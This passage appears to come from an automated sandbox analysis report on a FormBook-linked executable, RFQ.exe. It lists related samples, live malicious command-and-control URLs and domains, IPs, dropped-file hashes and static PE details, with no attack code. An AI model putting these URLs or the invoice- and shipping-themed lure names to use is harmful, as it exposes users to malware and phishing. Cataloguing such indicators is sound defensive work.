                                                                                                      BL4567GH67_xls.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.thegoldengirlsshop.com/n8t5/
                                                                                                      W9PJhOS2if.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                                                      • www.vaesen.net/h2uv/
                                                                                                      DHL 986022_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                      • www.heavydripluxury.com/avr4/
                                                                                                      KCS20240042- cutoms clearance doc.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.modelmotoringco.com/gh9e/
                                                                                                      Scan Document Copy_docx.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.thegoldengirlsshop.com/n8t5/
                                                                                                      TNT Invoice 09004105_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                      • www.heavydripluxury.com/avr4/
                                                                                                      ungziped_file.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.thegoldengirlsshop.com/n8t5/
                                                                                                      33BMmt58Bj.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.vicatti.com/dhra/
                                                                                                      PO20024040422PACK.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.myspinpods.com/bnz5/
                                                                                                      203.161.50.128BL4567GH67_xls.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.momentumholdings.top/n8t5/
                                                                                                      Scan Document Copy_docx.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.momentumholdings.top/n8t5/
                                                                                                      ungziped_file.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.momentumholdings.top/n8t5/
                                                                                                      PO20024040422PACK.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.fusionndustries.xyz/bnz5/
                                                                                                      66.96.162.136PO20024040422PACK.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.seatheskydesign.online/bnz5/
                                                                                                      Arborean.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • www.texploraco.online/m9so/
                                                                                                      PI5102295.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.chowdergolf.com/k056/?4hzh=z6Y8Z0&a8GP-0=5DE7UNbbog5zDsTyVFzOiOph4PjluAkr+qlOyu81SjiX2ZbNgObcitNBRxv1xvFFv1g8f+q+IVMT8U4ltKUQAjRtN3CFu01yhA==
                                                                                                      SecuriteInfo.com.Trojan.GenericKD.61688138.7209.1529.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.chowdergolf.com/k056/?bH=ZR2t9tZxXpFp&j48x=5DE7UNbbog5zDsTyVFzOiOph4PjluAkr+qlOyu81SjiX2ZbNgObcitNBRxv1xvFFv1g8f+q+IVMT8U4ltKUQAmFwJwWFhU9qhA==
                                                                                                      ZsFMADRfZB.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.chowdergolf.com/k056/?2dyL8P=5DE7UNbbog5zDsTyVFzOiOph4PjluAkr+qlOyu81SjiX2ZbNgObcitNBRxv1xvFFv1g8f+q+IVMT8U4ltKUVOG9aDmD4qWBTgQ==&I6Ah=eFQ8RbYHBTF0_Z
                                                                                                      SecuriteInfo.com.Trojan.DownLoaderNET.447.13310.17565.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.chowdergolf.com/k056/?t0GX=kdo4s&9rW=5DE7UNbbog5zDsTyVFzOiOph4PjluAkr+qlOyu81SjiX2ZbNgObcitNBRxv1xvFFv1g8f+q+IVMT8U4ltKUVJG9xJFb7hHBTqTW9msptP3wc
                                                                                                      SecuriteInfo.com.Trojan.DownloaderNET.345.11377.31950.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.chowdergolf.com/k056/?9ro=5DE7UNbbog5zDsTyVFzOiOph4PjluAkr+qlOyu81SjiX2ZbNgObcitNBRxv1xvFFv1g8f+q+IVMT8U4ltKUVJG9xJFb7hHBTqTW9msptP3wc&q2ML=zTqLQN
                                                                                                      Amended Contract.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • www.chowdergolf.com/kbt1/?nZ=ATSH&5j=e+KA5z84vISHdPcHBXUXSBWWcQEWdQfIHjv5s/vlzvk8j6sbOr1hir+U8KmUbwBo4t7k+xKI+GOcdsyx6zS2hKNyAntMwwu58Q==
                                                                                                      SKMB610952.jsGet hashmaliciousFormBookBrowse
                                                                                                      • www.chowdergolf.com/k056/
                                                                                                      SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.738.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.thehallowmusic.com/bigm/?5jHPH=d1ZpC8vLuCIIc9JRFfU/wrzd0ve6rWmSVt7jCvAfiiXdQ+1eaav3fDcR0myCzn92Ng4i&m2MD3=6l-DM6YxAV
                                                                                                      185.215.4.13PO20024040422PACK.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.naglissere.ru/bnz5/
                                                                                                      uuctgqafmcr.exeGet hashmaliciousUnknownBrowse
                                                                                                      • kremz.ru/123.gif
                                                                                                      SRMETALINDUSTRIES.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.sashaignatenko.com/n58i/?7nVT9d=P6AhC8Yh4LuLMhK0&fD=IQPyE+VrRvak8LK8nAdRdA+GXS2RT8iR9v4gvsbeLz4LfgOhT+qf8KqQA9G0pMp8GxoQ9RLGrw==

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      www.othlastore.comPO20024040422PACK.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 91.195.240.117
                                                                                                      www.vvbgsekbo.storePO20024040422PACK.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 43.132.191.179
                                                                                                      ccxx.cat-dragon-diiojsofso.comfedex awb &Invoice.vbsGet hashmaliciousFormBookBrowse
                                                                                                      • 134.122.178.171
                                                                                                      PO20024040422PACK.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 134.122.178.172
                                                                                                      www.myspinpods.comPO20024040422PACK.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 91.195.240.117
                                                                                                      www.book-of-degen.xyzPO20024040422PACK.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 75.2.60.5
                                                                                                      www.fusionndustries.xyzPO20024040422PACK.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 203.161.50.128
                                                                                                      www.ojyphyi.websiteBL4567GH67_xls.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 103.66.94.182
                                                                                                      Scan Document Copy_docx.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 103.66.94.182
                                                                                                      ungziped_file.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 103.66.94.182
                                                                                                      PO20024040422PACK.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 103.66.94.182
                                                                                                      www.collegeclubapparel.comPO20024040422PACK.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 91.195.240.117
                                                                                                      www.seatheskydesign.onlinePO20024040422PACK.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 66.96.162.136
                                                                                                      www.elysiangame.onlinePO20024040422PACK.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 174.138.177.173
                                                                                                      www.blueberry-breeze.comPO20024040422PACK.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 91.195.240.117

                                                                                                      ASNs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      VNPT-AS-VNVNPTCorpVNC4OTm1FW94.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 113.181.75.110
                                                                                                      Ud310iQZnO.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 123.24.252.109
                                                                                                      VOlsbvDoA0.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 113.186.186.159
                                                                                                      I72po0MZQY.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 123.21.171.152
                                                                                                      XFJxqIEFFQ.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 113.178.171.96
                                                                                                      P5uKPY120j.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 123.17.251.208
                                                                                                      5FZDO0kb81.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 113.160.104.146
                                                                                                      Ordin de plat#U0103.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 203.161.50.129
                                                                                                      arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 14.166.103.221
                                                                                                      fedex awb &Invoice.vbsGet hashmaliciousFormBookBrowse
                                                                                                      • 203.161.50.127
                                                                                                      SEDO-ASDENEW-ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 91.195.240.19
                                                                                                      VAT PO 24000042.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 91.195.240.123
                                                                                                      202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • 91.195.240.19
                                                                                                      SecuriteInfo.com.Trojan.Packed2.46654.20750.14267.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 91.195.240.123
                                                                                                      Ordin de plat#U0103.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 91.195.240.123
                                                                                                      PO# ROSIT#U00a0MR2309040.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • 91.195.240.19
                                                                                                      alhadani Aprilorders140424.scr.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 91.195.240.19
                                                                                                      Arrival Notice.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • 91.195.240.19
                                                                                                      fedex awb &Invoice.vbsGet hashmaliciousFormBookBrowse
                                                                                                      • 91.195.240.94
                                                                                                      HSBC Advice_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                      • 91.195.240.117
                                                                                                      TVHORADADAESVkiGKeyI3L.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 156.67.60.54
                                                                                                      57u0xHoYXa.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                      • 156.67.60.72
                                                                                                      BxTzBn7FT0.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                      • 156.67.60.40
                                                                                                      2BVJRatDwx.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                      • 156.67.60.33
                                                                                                      https://srtminiserver.com/downloadGet hashmaliciousUnknownBrowse
                                                                                                      • 185.215.4.66
                                                                                                      GQVUENt6FZ.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 185.215.4.61
                                                                                                      PO20024040422PACK.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 185.215.4.13
                                                                                                      HUXwk7lplj.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 156.67.60.51
                                                                                                      SecuriteInfo.com.Linux.Siggen.9999.14347.10667.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 156.67.60.38
                                                                                                      kn328E7C2B.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                                                                                                      • 185.75.20.119
                                                                                                      BIZLAND-SDUSNEW-ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 66.96.161.166
                                                                                                      alhadani Aprilorders140424.scr.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 66.96.161.166
                                                                                                      fedex awb &Invoice.vbsGet hashmaliciousFormBookBrowse
                                                                                                      • 66.96.162.128
                                                                                                      https://wwwlkwmwm12m21mm211.z13.web.core.windows.net/Get hashmaliciousHTMLPhisherBrowse
                                                                                                      • 66.96.162.150
                                                                                                      f4CdNDrJp8.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 66.96.161.166
                                                                                                      http://cloudflare-ipfs.com/ipfs/bafybeiaurhzpwdg3jgpdaqkmfxxct4tvtpawnwn2cgbpcunxjw3aaekyc4/serverskolo.html#ZnJhbmsuam9uZXNAZmJpLmdvdgGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 65.254.250.40
                                                                                                      LMZ05240257824426283637366563_Final Order.vbsGet hashmaliciousFormBookBrowse
                                                                                                      • 66.96.162.145
                                                                                                      P76fGr4wt3.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 66.96.145.194
                                                                                                      XJBYhQFCGi.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 66.96.162.146
                                                                                                      AWB5889829680.scr.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 66.96.161.166
                                                                                                      IS-AS-1USvpjapdhf4d.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                      • 206.72.202.212
                                                                                                      ToUXp7NTcb.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 162.246.17.45
                                                                                                      http://earnandexcel.comGet hashmaliciousUnknownBrowse
                                                                                                      • 216.219.92.22
                                                                                                      http://bckonline.com/2018/12/21/orlando-brown-tells-dr-phil-that-he-has-four-kids-and-the-2-year-old-is-still-in-the-belly-video/Get hashmaliciousUnknownBrowse
                                                                                                      • 216.219.92.22
                                                                                                      http://easywithai.comGet hashmaliciousUnknownBrowse
                                                                                                      • 216.219.92.22
                                                                                                      DOC1744 - 17441744.lnkGet hashmaliciousUnknownBrowse
                                                                                                      • 64.20.41.122
                                                                                                      https://marine-oceans.comGet hashmaliciousUnknownBrowse
                                                                                                      • 216.219.92.22
                                                                                                      https://earnandexcel.com/blog/how-to-expand-columns-in-excel-multiple-tricks-to-resize-columns-rows/Get hashmaliciousUnknownBrowse
                                                                                                      • 216.219.92.22
                                                                                                      http://192.64.86.243Get hashmaliciousUnknownBrowse
                                                                                                      • 192.64.86.243
                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.9127.4621.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 162.220.165.43

                                                                                                      JA3 Fingerprints

                                                                                                      No context

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ.exe.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\RFQ.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1216
                                                                                                      Entropy (8bit):5.34331486778365
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2232
                                                                                                      Entropy (8bit):5.380805901110357
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:lylWSU4xympjgs4Rc9tEoUl8NPZHUl7u1iMugeC/ZM0Uyus:lGLHxvCsIcnSKRHmOugw1s
                                                                                                      MD5:19032BC6BBC2FC23A3E7E1C2829CD2C3
                                                                                                      SHA1:8403CE1FBD50E9B8E12184D3D574288C79720DA7
                                                                                                      SHA-256:E0DFD190CCB48CD1607F5FEA0D25EB839CF1894FCCA9DA90E8E088AA95AF84BA
                                                                                                      SHA-512:80FBB10C36F46447CEE12D552BF769007B2D03E8B232B13A9F3267378C9B735F45C31BDEDF8E7066507361275414855DD445064D7FF8726E1BC20F19417D7AF5
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............V.}...@...i...........System.Transactions.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2sxwhesn.ytw.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_adwa53ok.joc.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h20e2bjt.bts.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lyrwqexs.umm.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\dvvZj3l0

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\icacls.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                      Category:dropped
                                                                                                      Size (bytes):196608
                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Entropy (8bit):7.785777316180597
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                      File name:RFQ.exe
                                                                                                      File size:820'224 bytes
                                                                                                      MD5:4d82cc1b35b8dc9ec7d149f1b8b95e95
                                                                                                      SHA1:a1d363742603070b3fc7d2db4fc431307618b1b8
                                                                                                      SHA256:eedd6d6a9ec4bf82ca87e66c1ae5b86983e8479598df71f3602283b93dd07035
                                                                                                      SHA512:4551b327f1b1fe4bc7e915898cc5eb1f89b5d0ccfe4c714591cb83fffed7d1c508071248c8c54cb0ce5e66ad800641e6b1b37496ce1a34b5c5814d7fe044334a
                                                                                                      SSDEEP:24576:D29ueLM9QItbS+57TPtSr2h3POtV3lAiwN:D29ueL6tbV57jtSrUPUw
                                                                                                      TLSH:9205F1586ABB9F2ADAFE43F68522182407F1B25F7221E35F4FC6A0D95814FC40952F63
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-.f.................z..........^.... ........@.. ....................................@................................

                                                                                                      File Icon

                                                                                                      Icon Hash:00928e8e8686b000

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x4c985e
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x661E2DA6 [Tue Apr 16 07:49:58 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      jmp dword ptr [00402000h]
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc98080x53.text
